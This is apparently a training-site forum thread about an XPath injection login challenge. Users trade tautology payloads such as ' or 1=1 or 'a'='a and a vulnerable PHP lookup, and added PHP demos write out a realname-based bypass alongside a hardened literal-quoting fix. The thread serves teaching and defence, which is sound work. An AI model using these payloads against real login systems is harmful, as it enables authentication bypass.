So I am completely stumped by this one.
I’ve done reading on XML and XML injection and think I understand the concept of it.
So far I’ve been injecting >> Sandra' or 1=1 or 'a'='a
and this brings up a different error.
I’ve tried many different variations of this and managed to bring up the different error, but I can’t seem to pass the level.
Could anyone suggest any articles to read or help me out with where I’m going wrong?
Any help would be appreciated.
-Shadowman
XPath injection requires a bit of knowledge about the XML schema and how an XPath query works. Or I should say: like the column name in SQLi, the element name in XPath injection is important as well.
Why are you going wrong? Because you focus on logical operators and forget the importance of the element name(s), maybe. :p
This PHP example should be of some help for this level:
```php
/* Preparation stuff */
$doc = new DOMDocument;
$doc->preserveWhiteSpace = false;
$file = file_get_contents("users.xml"); // users.xml contains users' data
$doc->loadXML($file);
/* End Preparation stuff */

/* XPath query: user input is concatenated straight into the predicate (vulnerable) */
$xpath = new DOMXPath($doc);
$username = "place_your_username_here";
$password = "place_your_password_here";
$query = "//user[username/text() = '" . $username . "' and password/text() = '" . $password . "']";
$users = $xpath->query($query);
/* End XPath query */

/* Print every child element of each matched <user> */
foreach ($users as $user) {
    foreach ($user->childNodes as $node) {
        echo $node->nodeName . " - " . $node->nodeValue . "\n";
    }
}
/* End Print */
```
users.xml
```xml
<?xml version="1.0"?>
<users>
  <user>
    <username>admin</username>
    <password>5f4dcc3b5aa765d61d8327deb882cf99</password>
    <realname>Harry Potter</realname>
  </user>
  <user>
    <username>user</username>
    <password>202cb962ac59075b964b07152d234b70</password>
    <realname>Gandalf</realname>
  </user>
</users>
```
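The mechanism freewind1012 is pointing at, as an added example that is not part of the original post or of the site's own code: a PHP script that replays the vulnerable lookup above against an in-memory copy of users.xml, then runs the same inputs through a hardened variant. The data is constructed for the demo: the first two users are the thread's, the third record (sandramurphyuser / hardpass / Sandra Murphy) is invented, as in Wallace-'s xpathtester post further down. It needs only PHP with the dom extension.

```php
<?php
// Added example (not the thread's own code): replays freewind1012's vulnerable
// lookup against an in-memory copy of users.xml, then a hardened variant.
// Constructed data: the first two users are the thread's; the third record
// (sandramurphyuser / hardpass) is invented, as in Wallace-'s xpathtester post.
$usersXml = <<<'XML'
<?xml version="1.0"?>
<users>
  <user><username>admin</username><password>5f4dcc3b5aa765d61d8327deb882cf99</password><realname>Harry Potter</realname></user>
  <user><username>user</username><password>202cb962ac59075b964b07152d234b70</password><realname>Gandalf</realname></user>
  <user><username>sandramurphyuser</username><password>hardpass</password><realname>Sandra Murphy</realname></user>
</users>
XML;

$doc = new DOMDocument();
$doc->preserveWhiteSpace = false;
$doc->loadXML($usersXml);
$xpath = new DOMXPath($doc);

// Vulnerable: raw input is concatenated into the predicate, exactly as in the
// thread's snippet. Returns the realname of every matched <user>, in document order.
function vulnerableLogin(DOMXPath $xpath, string $username, string $password): array
{
    $query = "//user[username/text() = '" . $username . "' and password/text() = '" . $password . "']";
    $nodes = @$xpath->query($query);   // false (plus a warning) if libxml2 cannot compile it
    if ($nodes === false) {
        return ['<invalid xpath>'];
    }
    $matched = [];
    foreach ($nodes as $user) {
        $matched[] = $xpath->evaluate('string(realname)', $user);
    }
    return $matched;
}

// XPath 1.0 has no escape character inside string literals, so a value is quoted
// with whichever quote it does not contain, or spliced together with concat()
// when it contains both. The result is always a literal, never an expression.
function xpathLiteral(string $value): string
{
    if (strpos($value, "'") === false) {
        return "'" . $value . "'";
    }
    if (strpos($value, '"') === false) {
        return '"' . $value . '"';
    }
    $parts = [];
    foreach (explode("'", $value) as $i => $chunk) {
        if ($i > 0) {
            $parts[] = '"\'"';      // a lone single quote as a double-quoted literal
        }
        if ($chunk !== '') {
            $parts[] = "'" . $chunk . "'";
        }
    }
    return 'concat(' . implode(', ', $parts) . ')';
}

// Hardened: same query shape, but user input can only ever be compared as text.
function safeLogin(DOMXPath $xpath, string $username, string $password): array
{
    $query = '//user[username/text() = ' . xpathLiteral($username)
           . ' and password/text() = ' . xpathLiteral($password) . ']';
    $matched = [];
    foreach ($xpath->query($query) as $user) {
        $matched[] = $xpath->evaluate('string(realname)', $user);
    }
    return $matched;
}

$cases = [
    'legit'      => ['user', '202cb962ac59075b964b07152d234b70'],
    // Classic tautology: true for every <user>, so the app sees the whole list.
    'tautology'  => ["' or 1=1 or 'a'='a", 'blah'],
    // Element-name predicate: username and password stay false, and because
    // 'and' binds tighter than 'or' the trailing 'a'='a' only absorbs the
    // password clause, leaving the realname comparison as the deciding one.
    'by-element' => ["' or realname/text() = 'Sandra Murphy' or 'a'='a", 'blah'],
];
foreach ($cases as $label => [$u, $p]) {
    printf("%-11s vulnerable: %-48s safe: %s\n", $label,
        json_encode(vulnerableLogin($xpath, $u, $p)), json_encode(safeLogin($xpath, $u, $p)));
}
```

Run it with `php xpath_demo.php`. The tautology payload matches every `<user>` in document order, which is why a login that simply takes the first match lands on admin rather than on the account you wanted; the element-name payload keeps the username and password comparisons false and lets `realname/text()` decide on its own. The hardened version returns nothing for either payload because the input is turned into an XPath string literal before it reaches the query; PHP's DOMXPath has no bound-variable API, so literal construction (or an allowlist check on the input) is the practical mitigation there.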
@TheShadowman you're very close to the real injection!! Just work on the injection you posted first!! And the usual “don't over-think it.” ??
- @IAmDevil
It's good to be back! :D
Thanks freewind for the assist. I was able to finish the level after having viewed the code. However, I must admit that it took me 63 attempts to figure out what the solution was. Rather embarrassing but still, relieved to have finished it.
This particular level helped me sharpen my concepts regarding sql injection. Now that I read the hint again, I realized that the hint is a BIG giveaway. Anyway, thanks for an awesome challenge. Love this site. :)
- @IAmDevil
It's good to be back! :D
If the injection =
[spoiler]' or 1=1 or 'a'='a[/spoiler]
and
[spoiler]her real name = Sandra Murphy[/spoiler]
then how would you combine the two in order to create a logical injection?
(Admin/Mod sidenote: I think I have hidden the answer well enough in my hint in this post, but if this gives too much away, please delete this post, and apologies.)
Credit goes to roun512 for explaining it this way to me, which then eventually helped point me in a more logical direction. I did not come up with this way of hinting at it, so don't thank me if this helps; thank roun512. :)
@fear-15: You may want to learn SQL injection first.
10 years ago
0
One point to all you potential hackers out there. Read what it says carefully: this login screen is trying something a bit different and is NOT using SQL. Try and login as the user whose real name is ‘Sandra Murphy’. Take your time over it, and even though it is not using SQL, reading up on SQL will help you to understand what you have to do and also help you pass the level. Good luck. :)
Guys, I would just like to share some hints, if possible :)
The thing is that you know you don't have ‘username’ and ‘password’, but you know the ‘realname’. Can you write up a logical sequence such that if ‘realname’ is TRUE, the entire code still returns TRUE, even though ‘username’ and ‘password’ both return FALSE?
That is a f**king big hint, isn't it :D :D
Everyone knows how to do a regular SQL injection, and it's almost the same for XPath, but combining the realname within the injection is what stumps a lot of people.
Don't try to add to the end of the injection; change a part of the original injection itself to encompass the information you already know.
I think this has been told, but just let me make it clear again!! In SQL injection we inject something like:
username: blah' OR 1=1 OR 'a'='a
and password: blah
Now, we have to use all the info that is given to us to make a logical injection for the level.
One more thing: though SQL injection is very similar to XPath injection, an SQL query is different from an XPath query.
Keep this in mind and go for it!! Good luck :)
10 years ago | edited 10 years ago
0
Now I think everyone should be able to complete this level based on the explanation provided by @Abhi_hacker
- @IAmDevil
It's good to be back! :D
Should I delete it?? I have tried to be as limited as possible, but if you say so, I can delete it or edit it!!
Only those who have read about SQL injection and XPath queries can interpret the hint, whereas for others (newbies) it's still quite concealed. But just tell me if you want me to remove it!! :)
10 years ago | edited 10 years ago
0
Hey Abhi_hacker, that is too close, mate. You have given a hint that is too close; it is more like the answer. Please either alter your post or remove it. It's more or less the same as Shadowman's spoiler. Okay, mate?? :)
Okk… I'll just change it right away. No problem!!
Re: I have edited the post and removed the hint that was disclosing the answer. All that is left is a bit related to SQL (I think they should get at least that much) and some general instructions regarding the level!!
Hope this doesn't cause any further problems. :)
10 years ago
0
Yes, mate, no problem. It's not all down to you, as there are others just as much to blame for giving too much away for the level. Thanks for your action. :)
- @IAmDevil
It's good to be back! :D
I’ve used this site: http://www.xpathtester.com/xpath
In this case:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<users>
  <user>
    <username>admin</username>
    <password>5f4dcc3b5aa765d61d8327deb882cf99</password>
    <realname>Harry Potter</realname>
  </user>
  <user>
    <username>user</username>
    <password>202cb962ac59075b964b07152d234b70</password>
    <realname>Gandalf</realname>
  </user>
  <user>
    <username>sandramurphyuser</username>
    <password>hardpass</password>
    <realname>Sandra Murphy</realname>
  </user>
</users>
```
when I submit:
`string(//user[realname='Sandra Murphy']/username/text())`
it returns: sandramurphyuser
and
`string(//user[realname='Sandra Murphy']/password/text())`
returns: hardpass
Am I on the right track? Do I need to send the first one in login and the second one in password?
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\’‘ at line 1
Based on this:
```php
$query = "//user[username/text() = '" . $username . "' and password/text() = '" . $password . "']";
```
I tried this:
user: `' OR //user[realname/text() = 'Sandra Murphy']/username/text() OR ''='`
pass: `' OR //user[realname/text() = 'Sandra Murphy']/password/text() OR ''='`
```php
$query = "//user[username/text() = '' OR //user[realname/text() = 'Sandra Murphy']/username/text() OR ''='' and password/text() = '' OR //user[realname/text() = 'Sandra Murphy']/password/text() OR ''='']";
```
But it doesn't work. I will study XPath harder…
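A check on the payload in this post (and the xpathtester queries in the post before it), added here and not taken from the thread: it feeds the expression, as posted and as it would read with lowercase operators, to libxml2's XPath 1.0 evaluator, which is the engine behind the DOMXPath snippet earlier in the thread. The three-user document is constructed from the xpathtester data above; Sandra's record is invented there as well.

```php
<?php
// Added example, not code from the thread. Constructed copy of the three-user
// document from the xpathtester post (Sandra's record is invented there too).
$doc = new DOMDocument();
$doc->loadXML(<<<'XML'
<users>
  <user><username>admin</username><password>5f4dcc3b5aa765d61d8327deb882cf99</password><realname>Harry Potter</realname></user>
  <user><username>user</username><password>202cb962ac59075b964b07152d234b70</password><realname>Gandalf</realname></user>
  <user><username>sandramurphyuser</username><password>hardpass</password><realname>Sandra Murphy</realname></user>
</users>
XML);
$xpath = new DOMXPath($doc);

// DOMXPath::query() emits a warning and returns false when libxml2 cannot
// compile the expression; treat that as "rejected".
function compiles(DOMXPath $xpath, string $expr): bool
{
    return @$xpath->query($expr) !== false;
}

// The vulnerable query shape from the thread, with the posted payloads dropped in.
$shape = "//user[username/text() = '%s' and password/text() = '%s']";
$sub   = "//user[realname/text() = 'Sandra Murphy']";
$asPosted  = sprintf($shape, "' OR {$sub}/username/text() OR ''='",
                             "' OR {$sub}/password/text() OR ''='");
$lowercase = sprintf($shape, "' or {$sub}/username/text() or ''='",
                             "' or {$sub}/password/text() or ''='");

// 1. XPath 1.0 operator names are case-sensitive ('or', 'and', 'div', 'mod'),
//    so 'OR' is not an operator and the expression does not compile at all.
printf("as posted compiles:    %s\n", compiles($xpath, $asPosted) ? 'yes' : 'no');

// 2. With lowercase operators the expression is valid, but the trailing ''=''
//    is true for every <user>, so the predicate is a tautology regardless of
//    what the Sandra sub-expression returns: every user matches.
printf("lowercase compiles:    %s\n", compiles($xpath, $lowercase) ? 'yes' : 'no');
printf("lowercase matches:     %d of %d users\n",
    $xpath->evaluate("count({$lowercase})"), $xpath->evaluate('count(//user)'));

// 3. Inside 'or', a node-set converts to boolean as "is it non-empty?", so the
//    sub-expression only ever contributes "a user named Sandra Murphy exists";
//    it never narrows the match to her record.
printf("boolean(sub/username): %s\n",
    $xpath->evaluate("boolean({$sub}/username/text())") ? 'true' : 'false');
printf("boolean(no such user): %s\n",
    $xpath->evaluate("boolean(//user[realname/text() = 'Nobody'])") ? 'true' : 'false');
```

The point of the check is that a login predicate cannot "return" a username the way `string(...)` does on xpathtester: whatever you put in the field becomes part of a boolean test over each `<user>`, so the useful question is which users that test is true for, not which strings a separate query can extract.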
Expanding on what @Wallace- said:
If we were doing an SQL injection we would use the following:
[Spoiler]' or 1=1 or 'a'='a[/Spoiler]
And we need to trick it into using the real name and forgetting the username and password. And we know that…
[Spoiler]her realname='Sandra Murphy'[/Spoiler]
How could you insert her real name into the injection to make it = true for just her real name?
If you don’t overthink it and keep trying things you’ll get it eventually.
```php
$query = "//user[username/text() = ' ' or 1=1 or 'a'='a' and password/text() = ' ' or 1=1 or 'a'='a']";
```
true and true; it works, but does it connect as the first user? (not ‘Sandra Murphy’)
The users' data are stored like this:
```xml
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
  <xs:element name="users">
    <xs:complexType>
      <xs:sequence>
        <xs:element name="user">
          <xs:complexType>
            <xs:sequence>
              <xs:element type="xs:string" name="login">userlogin</xs:element>
              <xs:element type="xs:string" name="password">hardpassword</xs:element>
              <xs:element type="xs:string" name="realname">Sandra Murphy</xs:element>
            </xs:sequence>
          </xs:complexType>
        </xs:element>
      </xs:sequence>
    </xs:complexType>
  </xs:element>
</xs:schema>
```
or like this:
```xml
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
  <xs:element name="users">
    <xs:complexType>
      <xs:sequence>
        <xs:element name="user">
          <xs:complexType>
            <xs:sequence>
              <xs:element type="xs:string" name="userlogin"/>
              <xs:element type="xs:string" name="hardpassword"/>
              <xs:element type="xs:string" name="Sandra Murphy"/>
            </xs:sequence>
          </xs:complexType>
        </xs:element>
      </xs:sequence>
    </xs:complexType>
  </xs:element>
</xs:schema>
```
9 years ago
0
So as I have understood, for username I need to use this code: `$query = "//user[username/text() = ' ' or 1=1 or 'a'='a'`
and for password this: `password/text() = ' ' or 1=1 or 'a'='a'];`
but it must connect as the Sandra Murphy user?
If you put “$query” in the field, your syntax is wrong. Your query has nothing specified about Sandra Murphy, so the server will not guess it.
9 years ago
0
So, based on this:
```xml
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
  <xs:element name="users">
    <xs:complexType>
      <xs:sequence>
        <xs:element name="user">
          <xs:complexType>
            <xs:sequence>
              <xs:element type="xs:string" name="login"/>
              <xs:element type="xs:string" name="password"/>
              <xs:element type="xs:string" name="realname"/>
            </xs:sequence>
          </xs:complexType>
        </xs:element>
      </xs:sequence>
    </xs:complexType>
  </xs:element>
</xs:schema>
```
I tried, instead of “$query”, to put “login”: `login = "//user[username/text() = ' ' or 1=1 or 'a'='a'`
but this is also not the correct answer, so… please give a hint.
@freewind1012 posted a good example:
```php
/* Preparation stuff */
$doc = new DOMDocument;
$doc->preserveWhiteSpace = false;
$file = file_get_contents("users.xml"); // users.xml contains users' data
$doc->loadXML($file);
/* End Preparation stuff */

/* XPath query: user input is concatenated straight into the predicate (vulnerable) */
$xpath = new DOMXPath($doc);
$username = "place_your_username_here";
$password = "place_your_password_here";
$query = "//user[username/text() = '" . $username . "' and password/text() = '" . $password . "']";
$users = $xpath->query($query);
/* End XPath query */

/* Print every child element of each matched <user> */
foreach ($users as $user) {
    foreach ($user->childNodes as $node) {
        echo $node->nodeName . " - " . $node->nodeValue . "\n";
    }
}
/* End Print */
```
Your input will be inserted into $username and $password, which are then substituted into the query. And about the code that you posted now:
[quote=dloser]Perhaps you should study even harder… For example, learn how to distinguish XML from XML schemas. You already posted a usable XML example and a site to check your queries. This should be more than enough to figure out how to solve the challenge.[/quote]
9 years ago
0
So for username: `$username = "//user[username/text() = ' ' or 1=1 or 'a'='a'`
and for password: `password/text() = ' ' or 1=1 or 'a'='a'];`
but I need to login as “Sandra Murphy”…… ?
Try and login as the user whose real name is ‘Sandra Murphy’.
Here you are using username.
Do you think you have to use it?
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\’‘ at line 1
@dino84 Hi dino84, have you done some research on XPath injections, and have you properly understood boolean logic? Understanding those two things is what let me pass this level. Next time, try to write your forum messages in English.
PS: [quote=HackThis.co.uk]This is an English only forum, please refrain from posting in other languages. We are working on adapting the site for your language.[/quote]
Translation for English speakers:
Hi dino84, did you do some research on XPath injections, and have you understood the boolean algorithm? Understanding those two things helped me to finish this level.
Used to be lexostras… but I got tired of my name, so now it's worse…
My GitHub, don't click this
@dino84 What about reading the whole forum about this level?
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\’‘ at line 1
Giveaway
Use this to test your XPath query, because you must use an XPath query.
Simplest: hack all users one by one; google position()=
Took me a while to get this right..
Indeed, all the hints are already on this forum. For further hints, I think you could think along the lines of how you achieve an all-true condition in SQL injection, where you insert a comment to bypass the checks. It works for XPath too. Just that, in this case, the big hint with the real user name is already given.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\’‘ at line 1
I wasn't talking about the injection itself, but the XPath. It probably is different because it is an XML schema instead of just XML, so I wanted to know if it worked the same, as for the XPath.
I have studied some things, and I am probably missing out, but what keeps getting me confused is the 1=1 or ‘a’=‘a’. It seems like something obvious to do for everybody, but why do you need to do it? I haven't found a single piece of information that tells me what the 1=1 is for. Is it just to make a statement immediately true?
As you can easily notice, I know nothing about SQLi, so do not use that as an example (unless you are recommending me to learn SQLi first).
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\’‘ at line 1
@freewind1012 was one of the greatest users of the website; so sad that we haven't seen him since 2014 :(
Message me anytime!